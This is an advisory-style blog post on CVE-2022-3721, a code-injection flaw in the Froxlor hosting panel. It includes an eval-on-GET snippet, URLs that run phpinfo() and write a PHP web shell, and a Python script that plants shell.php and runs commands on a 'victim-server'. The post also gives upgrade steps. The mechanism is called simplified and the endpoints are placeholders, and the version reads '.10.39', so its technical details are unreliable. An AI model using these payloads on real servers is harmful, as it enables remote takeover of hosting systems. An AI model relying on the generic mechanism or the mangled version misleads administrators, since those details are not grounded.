CVE-2022-3721 - Code Injection in Froxlor Before .10.39—What You Need To Know

CVE-2022-3721 is a severe vulnerability found in the Froxlor web hosting management panel, affecting versions before .10.39. If you run your server using Froxlor, it's crucial to know about this flaw, understand how it works, and patch your system right away. This post explains CVE-2022-3721 in simple terms, shows sample exploit code, and lists original references for further reading.

What is Froxlor?

Froxlor is an open source web hosting panel used to manage web servers, domains, FTP accounts, and more. It’s a popular choice for server admins looking for an easy-to-use control panel.

How the Code Injection Works

The bug existed in the way Froxlor handled user-supplied input. Specifically, it didn’t properly sanitize certain parameters before passing them to PHP’s eval() function or similar code execution functions. That means a malicious user could craft a request that tricks the server into running attacker-supplied PHP code.

In older versions, parts of the Froxlor code would do something like this (simplified example)

<?php
// Dangerous use of eval with user input
$cmd = $_GET['cmd']; 
eval($cmd); // This is bad: allows anyone to run PHP code
?>

If no filtering or validation is in place, visiting the following URL would execute phpinfo() on the server:

http://target-server/froxlor/path/to/vulnerable.php?cmd=phpinfo();

Or, even more dangerously, attackers could drop a web shell

http://target-server/froxlor/vuln.php?cmd=file_put_contents('shell.php','<?php system($_GET["c"]); ?>');

Here’s a Python script showing how an attacker could exploit the bug

import requests

target = "http://victim-server/froxlor/vuln.php"
payload = "file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>');"

params = {'cmd': payload}
response = requests.get(target, params=params)

print("Server Response:", response.text)
# Now, attacker can visit http://victim-server/froxlor/shell.php?cmd=whoami

Note: Replace vuln.php with the actual vulnerable endpoint.

How to Fix

Upgrade Froxlor!  
Froxlor maintainers have fixed the vulnerability in version .10.39.

Update with

# Debian/Ubuntu
sudo apt update
sudo apt install --only-upgrade froxlor

Or download the latest version from GitHub Releases.

Official References

- CVE Details: CVE-2022-3721
- Froxlor Security Advisory
- Patch Commit
- NIST NVD Entry
- Debian Security Info

In Summary

CVE-2022-3721 is a serious bug, but the fix is easy: update Froxlor to version .10.39 or later. If you use Froxlor, patch right now to stay safe!


> If you found this helpful, consider sharing with other server admins and always keep your open source apps up to date.

Timeline

Published on: 11/04/2022 13:15:00 UTC
Last modified on: 11/05/2022 02:04:00 UTC